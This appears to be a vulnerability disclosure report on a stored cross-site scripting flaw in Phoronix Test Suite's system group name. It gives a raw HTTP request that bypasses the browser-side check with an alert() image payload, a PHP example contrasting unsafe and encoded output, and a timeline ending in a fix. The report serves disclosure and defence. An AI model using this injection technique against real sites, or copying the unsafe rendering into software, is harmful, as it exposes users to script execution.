Cross-site Scripting (XSS) - Stored in phoronix-test-suite/phoronix-test-suite
Valid
Reported on Jan 4th 2022
Description
Hi there phoronix test suite maintainer team. There is a stored XSS in phoronix-test-suite source code. This is in group name.
Proof of Concept
- Install a local instance of phoronix test suite
- Create an account and log in, then create a group with name <img src=a onerror=alert(1)>. Note that you cannot create this on the UI because JavaScript to forbid this is implemented. To do that, you need a tool like Burp Suite to bypass the frontend check and create the system group directly. A request for creating a group with special characters would look like this:
POST /?systems HTTP/1.1
Host: {phoronix}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Origin: {phoronix}
Connection: close
Referer: {phoronix}?systems
Cookie: PHPSESSID=blfirmens92e3129mt1lsjt3m6; pts_websocket_server=ws%3A%2F%2F127.0.1.1%3A8427%2F
Upgrade-Insecure-Requests: 1

new_group=1235<img+src=a+onerror=alert(1)>
- After creating the system group, go back to /?systems and see that an alert pops up.
Impact
This vulnerability is capable of stored XSS.
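The report above shows that the only check on the group name ran in the browser, so a direct POST stored markup that /?systems later rendered. The following PHP is an added example, not code from phoronix-test-suite or its fix commit; the function names and the allow-list policy are assumptions. It pairs a server-side check on input with HTML encoding on output, next to the unsafe rendering for comparison.

```php
<?php
// Added example; function names and the naming policy are hypothetical,
// not taken from the phoronix-test-suite code base.

// Server-side check: repeat on the server whatever the browser-side script
// enforces, because a client can send the POST directly.
function validate_group_name(string $raw): ?string
{
    $name = trim($raw);
    // Assumed policy: letters, digits, space, underscore, dot, dash; 1-64 chars.
    if (preg_match('/\A[A-Za-z0-9 _.\-]{1,64}\z/', $name) !== 1) {
        return null; // reject instead of trying to strip tags
    }
    return $name;
}

// Unsafe rendering: the stored value is concatenated into HTML as-is.
function render_group_unsafe(string $stored): string
{
    return '<li>' . $stored . '</li>';
}

// Hardened rendering: encode at output time, so values that were stored
// before validation existed are displayed as text rather than parsed as markup.
function render_group_safe(string $stored): string
{
    $flags = ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5;
    return '<li>' . htmlspecialchars($stored, $flags, 'UTF-8') . '</li>';
}

// Constructed sample inputs: a benign name, and the new_group value from the
// request in the report after form URL decoding.
$samples = [
    'lab-rack-01',
    urldecode('1235<img+src=a+onerror=alert(1)>'),
];

foreach ($samples as $submitted) {
    $accepted = validate_group_name($submitted) !== null;
    echo 'input:    ', $submitted, "\n";
    echo 'accepted: ', $accepted ? 'yes' : 'no', "\n";
    echo 'unsafe:   ', render_group_unsafe($submitted), "\n";
    echo 'safe:     ', render_group_safe($submitted), "\n\n";
}
```

Run it with the PHP CLI; encoding on output is the control that also covers group names already in storage, while the input check only stops new ones.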
We are processing your report and will contact the phoronix-test-suite team within 24 hours.
a year ago
We have contacted a member of the phoronix-test-suite team and are waiting to hear back
a year ago
We have sent a follow up to the phoronix-test-suite team. We will try again in 7 days.
a year ago
A phoronix-test-suite/phoronix-test-suite maintainer marked this as fixed in 10.8.0 with commit 56fd0a
a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE